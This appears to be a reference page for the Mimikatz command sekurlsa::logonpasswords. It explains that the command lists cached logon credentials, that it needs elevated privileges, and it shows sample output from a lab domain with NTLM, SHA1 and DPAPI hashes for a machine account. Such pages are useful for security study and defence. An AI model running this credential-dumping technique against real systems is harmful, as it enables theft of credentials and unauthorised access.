Links

logonpasswords

sekurlsa::logonpasswords lists all available provider credentials. This usually shows recently logged on user and computer credentials.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
mimikatz # sekurlsa::logonpasswords
​
Authentication Id : 0 ; 712960 (00000000:000ae100)
Session : Service from 0
User Name : MediaAdmin$
Domain : hacklab
Logon Server : DC
Logon Time : 9/26/2021 4:57:38 AM
SID : S-1-5-21-2725560159-1428537199-2260736313-1427
msv :
[00000003] Primary
* Username : MediaAdmin$
* Domain : hacklab
* NTLM : 35950fdc8d3d99b4136510414009662d
* SHA1 : 185535108abf1fc0287dedbaff210b77989251c8
* DPAPI : 73006d59c6adcf27da6e097787a6d1f9
tspkg :
wdigest :
* Username : MediaAdmin$
* Domain : hacklab
* Password : (null)
kerberos :
* Username : MediaAdmin$
* Domain : HACKLAB.LOCAL
* Password : (null)
ssp :
credman :
Last modified 11mo ago